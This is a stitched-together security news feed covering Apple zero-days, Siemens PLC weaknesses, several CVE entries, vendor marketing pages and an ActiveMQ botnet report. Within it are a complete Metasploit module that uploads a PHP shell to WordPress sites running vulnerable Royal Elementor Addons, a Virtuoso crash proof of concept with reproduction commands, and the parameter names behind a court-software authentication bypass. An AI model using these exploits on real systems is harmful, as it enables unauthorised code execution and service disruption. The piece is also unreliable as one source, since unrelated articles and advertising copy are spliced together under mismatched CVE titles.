By Waqas
Immediate Action Required: Update Your Apple Devices, Including iPads, MacBooks, and iPhones, NOW!
This is a post from HackRead.com Read the original post: Apple Issues Urgent Security Patches for Zero-Day Vulnerabilities

Apple has recently released security updates to tackle two zero-day vulnerabilities (CVE-2023-42916 and CVE-2023-42917) that hackers are actively exploiting.

Apple Inc. today released crucial security updates aimed at mitigating two critical zero-day vulnerabilities identified as CVE-2023-42916 and CVE-2023-42917. These vulnerabilities have been actively exploited by hackers, posing a significant risk to a wide range of Apple devices.

The vulnerabilities allow attackers to execute arbitrary code and access sensitive data on compromised devices. These security flaws are particularly concerning because they can be exploited through malicious web pages, exploiting a memory corruption bug to gain unauthorized access.

****Affected Devices****

Apple’s advisory lists a comprehensive range of devices vulnerable to these exploits:

*   iPhone XS and later models
*   iPad Pro 10.5-inch
*   iPad (6th generation and later)
*   iPad Air (3rd generation and later)
*   iPad mini (5th generation and later)
*   iPad Pro 11-inch (1st generation and later)
*   iPad Pro 12.9-inch (2nd generation and later)
*   Mac computers running macOS Monterey, Ventura, and Sonoma

****Immediate Action Recommended****

Apple urges all users of these devices to update their software immediately. The updates are designed to patch the vulnerabilities and protect devices from potential exploits. Users can update their devices by going to the ‘Settings’ menu, selecting ‘General’, and then tapping on ‘Software Update’.

The urgent release of these security patches highlights the growing challenges in cybersecurity. Security experts advise users to always keep their software updated to the latest version and to be cautious of suspicious web pages and downloads.

In a comment to Hackread.com, Michael Covington, VP of Portfolio Strategy at Apple device security and management company Jamf, urged users to immediately update their devices.

“These latest OS updates, which address bugs in Apple’s WebKit, show that attackers continue to focus on exploiting the framework that downloads and presents web-based content,” Michael said. The latest bugs could lead to both data leakage and arbitrary code execution and appear to be tied to targeted attacks that are common against high-risk users,” he wanted.

****How to Update Your Apple Devices?****

Apple provides detailed instructions to ensure that users update their devices effectively. For iPhone and iPad users, navigate to Settings > General and click on Software Update.

For macOS users, click on the Apple menu (), go to System Settings, select General, and then click on Software Update. Automatic updates should be enabled to receive the Rapid Security Response patches seamlessly. Restarting the device may be necessary to complete the update process.

****_RELATED ARTICLES_****

1.  **Apple Safari Safest, Google Chrome Riskiest Browser of 2022**
2.  **Update NOW! Pegasus Spyware Exploiting iPhones on Latest iOS**
3.  **Apple issues iPhone software update after fake police ransomware scam**

Apple Issues Urgent Security Patches for Zero-Day Vulnerabilities

Security updates are tedious and difficult, so users continue to use a weak version of a core protocol and remain exposed to major attacks on critical infrastructure.

Source: John Edwards via Alamy Stock Photo

Programmable logic controllers (PLCs) that were vulnerable to the Stuxnet attack are still in use globally and rarely have security controls deployed — meaning they're still at risk.

More than 10 years after Stuxnet, new research shows users rarely switch on security controls such as using passwords, and feel updates are too cumbersome to be applied.

Colin Finck, tech lead of reverse engineering and connectivity at Enlyze, says the Siemens proprietary protocol which is used to read and write data as well as to program the S7 PLC. However, this is only protected by obfuscation, which the researchers were able to bypass.

Finck and his colleague Tom Dohrmann, software engineer, reverse engineering and connectivity, will present their findings at Black Hat Europe in London next week, in a talk titled "A Decade After Stuxnet: How Siemens S7 Is Still an Attacker's Heaven."

**Still Feeling the Stuxnet Effects**

In the 2010 attack, the Stuxnet attackers exploited several zero-day vulnerabilities in Microsoft Windows to ultimately gain access to Siemens software and the PLCs. This was done to gain access to and effectively damage high-speed centrifuges at the Iranian Bushehr nuclear power plant.

The impact of Stuxnet was huge, as it remotely damaged around a thousand centrifuges, and the worm's controllers were also able to analyze communication protocols between the PLCs to exploit further technological weaknesses. It also paved the way for things to come: After Stuxnet, a number of industrial control-related attacks were detected over the years, including BlackEnergy and Colonial Pipeline.

Finck tells Dark Reading that after the Stuxnet attacks took place, Siemens developed a revised protocol for the PLCs that added "lots of obfuscation and cryptography layers." However, the researchers in recent probing were able to bypass that obfuscation to give them the ability to read and write instructions for the PLCs, and ultimately stop the controller working in a proof of concept.

A statement from Siemens sent to Dark Reading acknowledged that the levels of obfuscation do not offer enough security, and a Security Bulletin from October 2022 stated that two of the PLCs "use a built-in global private key which cannot be considered anymore as sufficiently protected."

The statement added: "Siemens has deprecated this previous version of the communication protocol and encourages everyone to migrate to V17 or later to enable the new TLS \[Transport Layer Security\]-based communication protocol."

**Improved Firmware**

That most recent Siemens firmware released in 2022 does include TLS, but Finck claims there is no "long-term service for cybersecurity issues" and calls for Siemens to provide better means to update firmware "because right now, it's wide open to anybody who could just access it over the Internet."

In its statement, Siemens said it is aware of the talk scheduled for Black Hat Europe and stated that the talk "will describe the details of the legacy PG/PC and HMI communication protocol as used between TIA Portal/HMIs and SIMATIC S7-1500 SW Controller in versions before V17."

The company stated that no previously unknown security vulnerabilities will be disclosed in this talk and that Siemens is in close coordination with the researchers. Siemens recommended users to apply mitigations, including:

*   Applying client authentication using strong and individual access level passwords.
    
*   Migrating to V17 or later to enable the new TLS-based communication protocol for all SIMATIC S7-1200/1500 PLCs including SW Controller (see Siemens Security Bulletin SSB-898115 \[2\]).
    
*   Implementing the defense-in-depth approach for plant operations and configure the environment according to Siemens operational guidelines for industrial security.
    

Though the researchers praised the response by Siemens, they noted that PLC firmware is rarely updated by users, "and there's not an established update process to quickly roll out \[updates\] to a fleet of machines."

Finck says doing updates is "probably a tedious manual process to walk to every machine, plug something in and update the firmware," and thus, Siemens needs to offer better update processes so customers have an incentive to deploy those updates.

In the meantime, he says, "you better not have a direct connection to all PLCs right now, due to the aforementioned security problems."

**About the Author(s)**

With more than 20 years experience of B2B journalism, including 12 years covering cybersecurity, Dan Raywood brings a wealth of experience and information security knowledge to the table. He has covered everything from the rise of APTs, nation-state hackers, and hacktivists, to data breaches and the increase in government regulation to better protect citizens and hold businesses to account. Dan is based in the U.K., and when not working, he spends his time stopping his cats from walking over his keyboard and worrying about the (Tottenham) Spurs’ next match.

Siemens PLCs Still Vulnerable to Stuxnet-like Cyberattacks

Tyler Technologies Court Case Management Plus allows a remote attacker to authenticate as any user by manipulating at least the 'CmWebSearchPfp/Login.aspx?xyzldk=' and 
'payforprint_CM/Redirector.ashx?userid=' parameters. The vulnerable "pay for print" feature was removed on or around 2023-11-01.

**Integrated Software for Courts & Justice Agencies**

Regardless of size or location, courts and justice agencies have one thing in common — the need to improve access to justice for citizens, to empower legal professionals, and to enable collaboration across justice agencies.

Tyler's courts and justice software solutions help agencies share data among all of the offices in the justice system — Connecting courts, prosecutors, and public defenders, as well as jails, auditors, inspectors general, police departments, and supervision offices. This integration saves time and creates operational efficiencies, eliminating redundancies, minimizing errors, and helping you to be more responsive to your citizens.

**Civil Process**

Meet your jurisdiction's unique civil process office, field and financial requirements. Tyler's flexible configuration make operations more efficient from business processes to state reporting requirements.

Explore Civil Process

**Court Case Management - County & State**

Tyler's cutting-edge court case management systems streamline processes and eliminate mountains of paper handling. We have a track record of success across thousands of courts, from the smallest municipal court to the largest statewide systems.

Explore Enterprise Justice

**Court Case Management - Municipal**

Managing court calendars, processing defendant notices, and responding to crowded courtrooms, Tyler understands the challenges high-volume municipal, mayor, traffic and justice courts face. Municipal courts have a unique pace and rhythm, and a set of requirements that are different from those of counties, districts and states. Our Municipal Justice solution meets that pace and exceeds our clients’ expectations.

Explore Municipal Justice

**Dispute Resolution**

Expanding access to justice and allowing citizens to resolve their own disputes online, anywhere, anytime – with proven technology using Online Dispute Resolution.

Explore Online Dispute Resolution

**Electronic Filing**

More than 850,000 users file over 28 million documents annually on our platforms with 99.999% uptime. In addition to an outstanding platform with outstanding support we also provide online tools to guide self-represented litigants through the process of filing online.

Explore eFile & Serve

**Investigations & Audits**

Successful investigations and audits rely on the quality and completeness of the data collected and examined. Our solutions allow investigators to track, share, use, and analyze data in order to resolve cases efficiently.

Explore Investigations & Audits

**Jury Management**

Jury duty may be the only interaction most of your constituents have with the court. Our jury solutions provide an easy experience for citizens to navigate and answer any questions they have.

Explore Jury Management

**Justice Insights**

Tyler’s Justice Insights can provide a broader view of performance while also measuring efficiencies and outcomes across multiple departments or jurisdictions. When strategically implemented, these solutions can give you an instant view of your entire justice system so you can make more informed decisions about resources, policies, and more.

Explore Justice Insights

**Prosecution & Attorneys**

For Prosecutors, Public Defenders, or Trial Lawyers more than anyone else in the justice system, data is key, and we make it easy to track and manage the critical information you need, leveraging electronic case files, effectively managing caseloads, and easily tracking data. Additionally, re:Search® changes the way legal professionals, the courts and court staff, as well as the media and the public, search for court case data.

Explore Enterprise Attorney Manager

**Supervision**

Simplify and streamline adult and juvenile probation functions and pretrial services with Tyler’s Enterprise Supervision solution. Ease your workload with a comprehensive tool to handle multiple supervisory management functions while integrating seamlessly with the full array of Enterprise Justice solutions.

Explore Enterprise Supervision

**Virtual Court**

More than just a secure video stream, Virtual Court directly integrates with the case management system to create a seamless workflow during remote court hearings. It was developed through collaboration with courts of varying sizes from across the country to ensure it provides reliability and security required by the justice system.

Explore Virtual Court

Explore Other Courts & Public Safety Offerings

Courts and public safety agencies of all sizes and locations have one thing in common: the need to improve collaboration, to share information among agencies and all offices in the justice system, and to provide powerful tools to legal professionals for day-to-day operations.

Tyler’s courts and public safety solutions help to break down barriers and share information more easily and more securely across all public safety and justice agencies.

Explore Courts & Public Safety

**Painting the vision of **fully connected communities**.**

At Tyler, we imagine a world where all city, county, and regional government services are connected within a healthy digital infrastructure. Connecting data, processes, and people makes communities safer, smarter, and more responsive to the needs of residents.

More About Connected Communities

CVE-2023-6342: Courts & Justice | Courts & Public Safety


A reflected XSS vulnerability allows an open redirect when the victim clicks a malicious link to an error page on 

Sophos Email Appliance 

older than version 4.5.3.4.



Hi everyone,

Sophos Email Appliance version 4.5.3.4 was released on February 2, 2023.

**Limited release**

Version 4.5.3.4 was released to an initial group of customers on February 2, 2023. This release will be made available to all customers over the next few weeks. If you would like to get early access to new features, please contact Sophos Support.

**Release Information**

This release resolves several issues. The appliance will restart after this update.

You should also familiarize yourself with the known issues, since improper configuration of certain options may cause unexpected behavior.

Before you begin installing and configuring the Email Appliance, you should review the configuration directions.

Internet Explorer 7 and later, and Mozilla Firefox version 4.x and later, are the only supported browsers for this product release. However, the Email Appliance has been optimized for current-generation browsers. If you are using an older browser such as Internet Explorer 6 and experience performance issues, consider upgrading to a newer version of Internet Explorer, or to a recent version of Firefox.

**Issues resolved in the Sophos Email Appliance 4.5.3.4 release:**

*   Fixed potential vulnerability to CVE-2021-36806 (SEA-1779).
*   Fixed a potential vulnerability to cipher block chaining (CBC) ciphers with TLS (SEA-1656). Disabled TLS 1.1 for port 25.
*   Removed expired certificates (SEA-1846).
*   Add Amazon root certificate authority (CA) (SEA-1683).

Reference: https://esa.sophos.com/rn/sea/concepts/ReleaseNotes\_4.5.3.4.html

CVE-2021-36806: Sophos Email Appliance version 4.5.3.4 released

PRESS RELEASE

EAST BRUNSWICK, N.J., Nov. 29, 2023 -- 1Kosmos, the company that unifies identity proofing and passwordless authentication, today announced the 1Kosmos BlockID platform now enables organizations to seamlessly extend web-based identity proofing sessions to a user's mobile device for scanning government issued documents. 

This new capability does not require a mobile application, and creates a frictionless web user journey by eliminating the need for a separate application to capture identity documents and meet identity assurance level (IAL) requirements. Unique to 1Kosmos is the use of a privacy by design architecture where personal information is accessible only upon user consent.

To enable fast and easy identity proofing from the web, without downloading a mobile application, 1Kosmos BlockID connects a browser to a session accessing the camera on a user's mobile device for document verification. It also validates the authenticity of government identity documents with issuing authorities and triangulates personal data from driver’s licenses, passports, national IDs, and more. In addition, 1Kosmos BlockID challenges the user to take a live selfie to ensure they are a real person and matches their selfie with the images scanned from the documents. 

“Traditional identity verification journeys performed on the web require users to install a mobile app for scanning government issued documents,” said Huzefa Olia, Co-Founder and COO for 1Kosmos. “For organizations that prefer an app-less experience, 1Kosmos BlockID eliminates the need for a dedicated app, while providing the flexibility to embed and customize document-based identity proofing across different platforms and end user journeys to suit their identity assurance and security requirements.” 

Cross Platform Identity Proofing

Like the 1Kosmos mobile app, the new app-less web based identity verification capabilities enable users to capture high quality images of government issued documents through mobile devices. 1Kosmos BlockID provides the following capabilities and benefits for implementing identity verification journeys across platforms:

*   Creates separate “verification sessions” for identity proofing with any type of document including driver’s license, passport, National ID and more
    
*   Provides a standalone web client that can extract identity data and validate the authenticity of the document template 
    
*   Offers an interface to define risk thresholds for decisioning on liveness, selfie match, etc. 
    
*   Supports integration with third party providers to validate authenticity of documents and data 
    
*   Enables administrators to review the result from the extraction of documents and data along with a recommendation from 1Kosmos on the status of verification (i.e., Pass or Fail) 
    
*   Enables organizations to build custom user verification journeys via the 1Kosmos control plane
    
*   Provides pre-deployment testing via proofing URLs
    
*   Includes built-in support for internationalization 
    
*   Meets W3C Web Content Accessibility Guidelines
    

Availability

The unified web and mobile identity verification capabilities are available immediately in the 1Kosmos BlockID platform.  

About 1Kosmos BlockID

The 1Kosmos BlockID platform verifies user identity for straight-through onboarding of customers, workers and citizens. It creates a reusable digital wallet for high assurance authentication into digital services and instant validation of end-user qualifications, competencies, authority, and more. A unique privacy-by-design architecture centered around a private and permissioned blockchain eliminates centralized honeypots of end user personal identifiable information (PII), simplifying compliance to privacy mandates such as GDPR and providing organizations tamper evident verification to always know the identity behind devices accessing applications, data and services. BlockID has attained certification to NIST 800-63-3 and UKDAIF via Kantara, FIDO2 and iBeta’s PAD Level 2 guidelines. It is delivered as a stand alone or embedded cloud service or via a managed service as a Credential Service Provider for residents.

About 1Kosmos

1Kosmos enables remote identity verification and passwordless multi-factor authentication for workers, customers and residents to securely transact with digital services. By unifying identity proofing, credential verification and strong authentication, the BlockID platform prevents identity impersonation, account takeover and fraud while delivering frictionless user experiences and preserving the privacy of users’ personal information. BlockID performs millions of authentications daily for government agencies and some of the largest banks, telecommunications, higher education and healthcare organizations in the world. The company is funded by Forgepoint Capital and Gula Tech Adventures with headquarters in East Brunswick, New Jersey. For more information, visit www.1kosmos.com and follow us  on X and LinkedIn.

1Kosmos Unifies Identity Verification User Journeys Across Web and Mobile Platforms

An issue in the box_deserialize_reusing function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INT , v2 BIGINT PRIMARY KEY) ;
 INSERT INTO v0 VALUES ( 20 , \-1 ) ;
 SELECT v1 + 77 , v2 FROM v0 UNION SELECT v2 , CASE WHEN 92 THEN 86 ELSE ( ( 32433852.000000 , 70038895.000000 ) , ( 64572024.000000 , 4442219.000000 ) ) END FROM v0 ORDER BY v2 + \-1 \* 40 ;

backtrace:

#0 0x876418 (box\_deserialize\_reusing+0x38)
#1 0x87917e (sslr\_qst\_get+0x46e)
#2 0x81f2f6 (select\_node\_input\_vec+0x656)
#3 0x7ba667 (select\_node\_input+0xa7)
#4 0x7af05e (qn\_input+0x3ce)
#5 0x7af78f (qn\_ts\_send\_output+0x23f)
#6 0x7b509e (table\_source\_input+0x16ee)
#7 0x7af05e (qn\_input+0x3ce)
#8 0x7af4c6 (qn\_send\_output+0x236)
#9 0x7af05e (qn\_input+0x3ce)
#10 0x7af4c6 (qn\_send\_output+0x236)
#11 0x8214bd (set\_ctr\_vec\_input+0x99d)
#12 0x7af05e (qn\_input+0x3ce)
#13 0x7c084b (qr\_exec+0x11db)
#14 0x7ce1d6 (sf\_sql\_execute+0x11a6)
#15 0x7cecde (sf\_sql\_execute\_w+0x17e)
#16 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#17 0xe214bc (future\_wrapper+0x3fc)
#18 0xe28dbe (\_thread\_boot+0x11e)
#19 0x7fca3837c609 (start\_thread+0xd9)
#20 0x7fca3814c133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48952: Fuzzer: Virtuoso 7.2.11 crashed at box_deserialize_reusing · Issue #1175 · openlink/virtuoso-opensource


In Progress MOVEit Transfer versions released before 2022.0.9 (14.0.9), 2022.1.10 (14.1.10), 2023.0.7 (15.0.7), a privilege escalation path associated with group administrators has been identified.  It is possible for a group administrator to elevate a group members permissions to the role of an organization administrator.


MOVEit enables your organization to meet strict cybersecurity compliance standards such as PCI-DSS, HIPAA, GDPR, SOC2 and more. Provide a secure environment for your most sensitive files, while easily ensuring the reliability of core business processes.

30-day FREE trial. No credit card required.

Release

**MOVEit 2023.1: Check Out All the New Features in the Latest Release**

**MOVEit Modules**

MOVEit’s flexible architecture makes it easy to choose the exact capabilities that match your organization’s specific needs.

**MOVEit Transfer**

*   **On-premise** solution.
*   Ensure management and control over your business-critical file transfers by consolidating them all on one system.
*   Leverage MOVEit Transfer’s file encryption, security, activity tracking tamper-evident logging, and centralized access controls.
*   Reliably and easily comply with SLAs, internal governance requirements and regulations like PCI, HIPAA, CCPA/CPRA and GDPR.

Explore MOVEit Transfer Free Trial

**MOVEit Cloud**

*   MOVEit Transfer hosted by Progress **as-a-Service in the Cloud**.
*   All the benefits of managed file transfer without the heavy lifting.
*   Operational reliability with clear SLAs and internal governance.
*   Compliant with PCI, HIPAA, CCPA/CPRA and GDPR.

Explore MOVEit Cloud Free Trial

**MOVEit Automation**

*   Works with MOVEit Cloud, MOVEit Transfer, hybrid cloud endpoints (AWS S3, Azure Blob, SharePoint, etc.) or any FTP system.
*   **Provides advanced workflow automation capabilities without the need for scripting.**
*   Securely share sensitive files with full visibility into all file transfer activities, including a tamper-evident audit trail.

Explore MOVEit Automation Free Trial

**Additional Features**

Email and Web Transfer

MOVEit Ad-Hoc makes secure file transfer easily accessible from Microsoft Outlook or a web browser to assure the compliant ad-hoc transfers of sensitive data.

Secure End-User Collaboration

Secure Folder Sharing provides internal and external end users with an easy-to-use, drag-and-drop collaboration capability as an alternative to using email or content collaboration to share sensitive data.

Mobile Managed File Transfer

The free MOVEit Mobile app puts secure and managed file transfer control at your fingertips via your iOS or Android device.

Flexible Deployment

Deployment flexibility means you can meet your exact needs with options ranging from MFT-as-a-Service, to public cloud to on-premises or hybrid cloud solutions.

MOVEit Add-in for Microsoft Outlook

Provides an exceptional user experience that makes sharing secure files intuitive and hassle-free. Deploys centrally with nothing for users to install or maintain.

DMZ Proxy Gateway

MOVEit Gateway is a DMZ proxy server that keeps confidential/sensitive data, authentication, and access information behind the firewall.

**Industries**

**Banking & Finance**

Secure file sharing is the foundation for trust in financial transactions. Use MOVEit to help meet PCI-DSS, GDPR, and ISO 27001 compliance requirements.

Explore

**Government & Public Sector**

MOVEit helps IT teams at almost every federal civilian agency and military branch to securely transfer mission-critical information and assure the performance of their networked infrastructures and applications.

Explore

**Healthcare**

When lives are on the line, IT teams need to deliver virtually zero downtime and assure the secure and confidential movement of patient data.

Explore

**Insurance**

Pushing claims or processing payments, IT teams in a highly regulated industry like insurance need powerful tools that make their lives simpler.

Explore

**Manufacturing**

Gain operational efficiencies and eliminate manual errors while securely delivering important files to customers and partners.

Explore

**Education**

Ensure your school protects and shares personally identifiable information through encryption that protects sensitive files at rest and in transit.

Explore

**Request Pricing**

Get a free price quote from one of our experts.

**Additional Capabilities**

**Multi-Tenancy**

Our Multi-tenancy option enables MOVEit Transfer to simultaneously serve multiple client organizations, or “tenants”, on a domain or username basis.

Download Data Sheet

**High Availability**

MOVEit Transfer has a flexible architecture that can be deployed on one or more systems to address availability, performance or scalability requirements.

Download Data Sheet

**Desktop Clients**

Choose from a full range of desktop clients to meet your needs, including an easy-to-use MOVEit Client for Windows and MacOS, WS\_FTP, MOVEit EZ and MOVEit Freely

See Desktop Clients

**API**

The MOVEit API offers third-party programs access to a wide variety of MOVEit Cloud and MOVEit Transfer services and administrative capabilities.

Download Data Sheet

**MOVEit Architecture**

Any FTPS ServerAny SFTP ServerAny HTTPS ServerAny ASx Server Mainframe/Unix Server Network Share Any FTPS ServerAny SFTP Server Azure Blob AWS S3 Firewall Firewall Sharepoint Email ServerSMIME Email Server Email Server Internet DMZ Secure Network Web Browser Web Browser Microsoft Outlook Mobile Users Mobile Users Any FTPS ClientAny SFTP ClientAS2 or AS3 ClientOther MOVEit Clients Any FTPS ClientAny SFTP ClientOther MOVEit Clients FTPS, SFTP, HTTPS, ASx FTPS, SFTP, SMB FTPS, SFTP, HTTPS Secure Tunel HTTPS FTPS, SFTP, HTTPS, ASx Any FTPS ServerAny SFTP ServerAny HTTPS ServerAny ASx Server Sharepoint Email ServerSMIME Email Server Azure Blob AWS S3 Internet FTPS, SFTP, HTTPS, ASx DMZ Firewall Firewall Web Browser Mobile Users Any FTPS ClientAny SFTP ClientAS2 or AS3 ClientOther MOVEit Clients HTTPS Mainframe/Unix Server Network Share Any FTPS ServerAny SFTP Server Email Server SECURETUNEL Web Browser MicrosoftOutlook Mobile Users Any FTPS ClientAny SFTP ClientOther MOVEit Clients FTPS, SFTP, HTTPS FTPS, SFTP, SMB Secure Network

**Awards**

**MOVEit Earns Gold Medal in Latest Info-Tech Report**

MOVEit named industry leader in latest Info-Tech report on MFT vendors, placing first in quality and breadth of features.

Read the Report

**Related Resources**

**MOVEit Managed File Transfer FAQs**

**Start Your Free MOVEit Trial**

CVE-2023-6218: MOVEit Secure Managed File Transfer Software | Progress

WordPress Royal Elementor Addons and Templates plugin versions prior to 1.3.79 suffer from a remote shell upload vulnerability.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WordPress Royal Elementor Addons RCE',        'Description' => %q{          Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79).        },        'Author' => [          'Fioravante Souza', # Vulnerability discovery          'Valentin Lobstein' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-5360'],          ['URL', 'https://vulners.com/nuclei/NUCLEI:CVE-2023-5360'],          ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']        ],        'Platform' => ['unix', 'linux', 'win', 'php'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Targets' => [['Automatic', {}]],        'DisclosureDate' => '2023-11-23',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Privileged' => false,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )  )  end  def check    return CheckCode::Unknown unless wordpress_and_online?    wp_version = wordpress_version    print_status("WordPress Version: #{wp_version}") if wp_version    check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')    if check_code.code != 'appears'      return CheckCode::Safe    end    plugin_version = check_code.details[:version]    print_good("Detected Royal Elementor Addons version: #{plugin_version}")    return CheckCode::Appears  end  def exploit    print_status('Attempting to retrieve nonce...')    nonce = retrieve_nonce    print_status('Sending payload')    uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')    data = {      'action' => 'wpr_addons_upload_file',      'max_file_size' => rand(10001),      'allowed_file_types' => 'ph$p',      'triggering_event' => 'click',      'wpr_addons_nonce' => nonce    }    file_content = '<?php '    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")    file_content << '?>'    file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"    post_data = Rex::MIME::Message.new    post_data.add_part(file_content, 'application/octet-stream', nil, "form-data; name=\"uploaded_file\"; filename=\"#{file_name}\"")    data.each_pair do |key, value|      post_data.add_part(value.to_s, nil, nil, "form-data; name=\"#{key}\"")    end    res = send_request_cgi({      'uri' => uri,      'method' => 'POST',      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'data' => post_data.to_s    })    unless res      fail_with(Failure::Unreachable, 'No response received from the target')    end    if res.code == 200 && res.body.include?('success')      print_good('Payload uploaded successfully')      response_data = JSON.parse(res.body)      if response_data.key?('data') && response_data['data'].key?('url')        file_url = response_data['data']['url']        print_status('Triggering the payload')        send_request_cgi({          'uri' => file_url,          'method' => 'GET'        })      else        fail_with(Failure::UnexpectedReply, 'Payload uploaded but no URL returned in the response')      end    else      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')    end  end  def retrieve_nonce    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')    fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200    match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)    fail_with(Failure::NoTarget, 'Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?') if match.nil? || match[1].nil?    nonce = JSON.parse(match[1])['nonce']    fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil?    print_good("Nonce found in response: #{nonce.inspect}")    nonce  endend

WordPress Royal Elementor Addons And Templates Remote Shell Upload

A serialization vulnerability in logback receiver component part of 
logback version 1.4.11 allows an attacker to mount a Denial-Of-Service 
attack by sending poisoned data.



CVE-2023-6378: News

The recently disclosed critical security flaw impacting Apache ActiveMQ is being actively exploited by threat actors to distribute a new Go-based botnet called GoTitan as well as a .NET program known as PrCtrl Rat that's capable of remotely commandeering the infected hosts.
The attacks involve the exploitation of a remote code execution bug (CVE-2023-46604, CVSS score: 10.0) that has been

Malware / Threat Intelligence

The recently disclosed critical security flaw impacting Apache ActiveMQ is being actively exploited by threat actors to distribute a new Go-based botnet called **GoTitan** as well as a .NET program known as **PrCtrl Rat** that's capable of remotely commandeering the infected hosts.

The attacks involve the exploitation of a remote code execution bug (CVE-2023-46604, CVSS score: 10.0) that has been weaponized by various hacking crews, including the Lazarus Group, in recent weeks.

Following a successful breach, the threat actors have been observed to drop next-stage payloads from a remote server, one of which is GoTitan, a botnet designed for orchestrating distributed denial-of-service (DDoS) attacks via protocols such as HTTP, UDP, TCP, and TLS.

"The attacker only provides binaries for x64 architectures, and the malware performs some checks before running," Fortinet Fortiguard Labs researcher Cara Lin said in a Tuesday analysis.

"It also creates a file named 'c.log' that records the execution time and program status. This file seems to be a debug log for the developer, which suggests that GoTitan is still in an early stage of development."

Fortinet said it also observed instances where the susceptible Apache ActiveMQ servers are being targeted to deploy another DDoS botnet called Ddostf, Kinsing malware for cryptojacking, and a command-and-control (C2) framework named Sliver.

Another notable malware delivered is a remote access trojan dubbed PrCtrl Rat that establishes contact with a C2 server to receive additional commands for execution on the system, harvest files, and download and upload files from and to the server.

"As of this writing, we have yet to receive any messages from the server, and the motive behind disseminating this tool remains unclear," Lin said. "However, once it infiltrates a user's environment, the remote server gains control over the system."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#ssl